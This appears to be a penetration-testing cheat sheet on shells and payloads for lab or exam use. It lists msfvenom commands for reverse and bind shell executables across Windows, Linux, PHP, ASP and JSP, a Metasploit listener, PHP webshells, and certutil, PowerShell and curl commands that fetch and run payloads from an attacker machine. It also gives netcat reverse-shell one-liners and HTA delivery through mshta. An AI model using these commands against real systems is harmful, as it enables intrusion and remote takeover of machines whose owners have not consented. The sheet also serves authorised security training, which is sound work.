Shells & Payloads
msfvenom - Payload Generation
| Command | Description |
|---|---|
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell.exe | Windows x64 Meterpreter reverse TCP. |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell.exe | Windows x86 Meterpreter reverse TCP. |
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<target_IP> LPORT=<port> -f exe > shell.exe | Windows bind TCP (Metasploit connects to target). |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell.elf | Linux x64 Meterpreter reverse TCP. |
msfvenom -p cmd/unix/bind_perl LHOST=<target_IP> LPORT=<port> -f raw > shell.pl | Linux bind Perl shell (lightweight, no dependencies). |
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.php | PHP Meterpreter reverse TCP. |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f asp > shell.asp | ASP reverse shell (IIS). |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.jsp | JSP reverse shell. |
msfvenom -l payloads | grep <keyword> | Search available payloads. |
msfvenom -p <payload> --list-options | Show payload options. |
Metasploit Listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <your_IP>
set LPORT 4444
exploit -jPHP Webshells
# Simple command execution
<?php system($_GET['cmd']); ?>
# Via POST
<?php system($_POST['cmd']); ?>
# Usage:
# curl http://<IP>/shell.php?cmd=whoami
# curl http://<IP>/shell.php?cmd=idASPX Webshell (IIS / Windows)
The cmdasp.aspx webshell (pre-installed in some lab environments) accepts commands via a form field. Access via browser or curl and run OS commands as the IIS application pool user (often SYSTEM).
# Download payload to target from ASPX webshell:
certutil -urlcache -split -f http://<kali_IP>:8080/shell.exe C:\Windows\Temp\shell.exe
# Execute it:
C:\Windows\Temp\shell.exeFile Transfer - Serving Payloads
| Command | Description |
|---|---|
python3 -m http.server 8080 | Serve current directory over HTTP on port 8080. |
python2 -m SimpleHTTPServer 8080 | Python 2 equivalent. |
certutil -urlcache -split -f http://<IP>:8080/<file> <dest> | Download file on Windows (no PowerShell needed). |
powershell -c "Invoke-WebRequest http://<IP>:8080/<file> -OutFile <dest>" | PowerShell download. |
wget http://<IP>:8080/<file> -O <dest> | Download on Linux. |
curl http://<IP>:8080/<file> -o <dest> | Download with curl. |
Netcat Shells
| Command | Description |
|---|---|
nc -lvnp <port> | Start netcat listener. |
nc <IP> <port> -e /bin/bash | Netcat reverse shell (Linux, if -e available). |
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <IP> <port> > /tmp/f | Netcat reverse shell without -e flag. |
nc <IP> <port> | Connect to a bind shell. |
Shell Stabilization (Linux)
After getting a basic shell, stabilize it for full interactivity:
# Method 1 - Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
python -c 'import pty; pty.spawn("/bin/bash")'
# Then:
Ctrl+Z
stty raw -echo; fg
export TERM=xterm# Method 2 - script
script /dev/null -c bashShell Upgrade - Meterpreter
| Command | Description |
|---|---|
sessions -u <id> | Upgrade a shell session to Meterpreter. |
post/multi/manage/shell_to_meterpreter | Post module to upgrade shell to Meterpreter. |
HTA Server - Windows Payload Delivery
# Metasploit - serves HTA and catches the session
use exploit/windows/misc/hta_server
set LHOST <kali_IP>
set LPORT 4446
run# Trigger from a Windows webshell:
mshta http://<kali_IP>:8080/<random>.htaUseful when you already have command execution (e.g., ASPX webshell) and need a full Meterpreter session.
Common Bind vs Reverse Decision
| Situation | Use |
|---|---|
| Target can reach Kali | Reverse shell (target calls back) |
| Target is behind NAT or on isolated network | Bind shell (Kali connects to target) |
| Internal host through Meterpreter pivot | Bind payload - reverse cannot reach Kali DMZ IP |